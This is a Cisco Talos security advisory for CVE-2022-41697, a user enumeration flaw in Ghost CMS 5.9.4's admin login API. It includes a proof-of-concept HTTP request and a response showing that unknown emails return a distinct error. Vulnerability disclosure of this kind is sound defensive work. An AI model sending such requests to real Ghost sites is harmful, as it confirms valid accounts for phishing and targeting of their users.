CVE-2022-41697: TALOS-2022-1625 || Cisco Talos Intelligence Group

SUMMARY

A user enumeration vulnerability exists in the login functionality of Ghost Foundation Ghost 5.9.4. A specially-crafted HTTP request can lead to a disclosure of sensitive information. An attacker can send a series of HTTP requests to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Ghost Foundation Ghost 5.9.4

PRODUCT URLS

Ghost - http://www.ghost.org

CVSSv3 SCORE

5.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CWE

CWE-204 - Response Discrepancy Information Exposure

DETAILS

Ghost is a content management system with tools to build a website, publish content and send newsletters. Ghost offers paid subscriptions to members and supports a number of integrations with external services.

A commonly overlooked weakness in web applications lets an attacker enumerate the application's user accounts. On its own it has limited impact, since the attacker still has to guess a valid password, and Ghost mitigates password guessing with a third-party rate-limiting library that tracks login attempts and imposes progressively longer timeouts before accepting further requests from a host. Any system that uses email addresses as usernames, however, lets an attacker profit from the enumeration without attacking the authentication mechanism at all: it is trivial to harvest candidate email addresses for an organization through other external means. If the organization is small enough, or the attacker can otherwise narrow down the likely users of the system, the enumeration confirms which of those addresses belong to real accounts, and therefore which users to target with phishing, exploit kits, etc.

OWASP - WSTG-IDNT-04

Exploit Proof of Concept

Request:

POST /ghost/api/admin/session HTTP/1.1
Host: localhost:3001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
X-Ghost-Version: 5.12
App-Pragma: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 64
Origin: http://localhost:3001
DNT: 1
Connection: close
Referer: http://localhost:3001/ghost/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"username":"[email protected]","password":"asdfasdfasdf"}

Response:

HTTP/1.1 404 Not Found
X-Powered-By: Express
Cache-Control: no-cache, private, no-store, must-revalidate, max-stale=0, post-check=0, pre-check=0
Access-Control-Allow-Origin: http://localhost:3001
Vary: Origin, Accept-Encoding
Content-Type: application/json; charset=utf-8
Content-Length: 227
ETag: W/"e3-u3gQCrLnLzZLBfGsRRRY7NHIbRI"
Date: Fri, 23 Sep 2022 20:39:45 GMT
Connection: close

{"errors":[{"message":"There is no user with that email address.","context":null,"type":"NotFoundError","details":null,"property":null,"help":null,"code":null,"id":"dbc5eba0-3b7f-11ed-927a-a985a499596d","ghostErrorCode":null}]}

TIMELINE

2022-10-26 - Vendor Disclosure
2022-10-26 - Initial Vendor Contact
2022-12-28 - Public Release

CREDIT

Dave McDaniel and other members of Cisco Talos.

Related news

Two New Security Flaws Reported in Ghost CMS Blogging Software

Cybersecurity researchers have detailed two security flaws in the JavaScript-based blogging platform known as Ghost, one of which could be abused to elevate privileges via specially crafted HTTP requests. Tracked as CVE-2022-41654 (CVSS score: 8.5), the authentication bypass vulnerability allows unprivileged users (i.e., members) to make unauthorized modifications to newsletter settings.

Vulnerability Spotlight: Authentication bypass and enumeration vulnerabilities in Ghost CMS

Dave McDaniel and other members of Cisco Talos discovered these vulnerabilities. Cisco Talos recently discovered two vulnerabilities in Ghost CMS, one authentication bypass vulnerability and one enumeration vulnerability. Ghost is a content management system with tools to build a website, publish content and send newsletters. Ghost offers paid subscriptions to
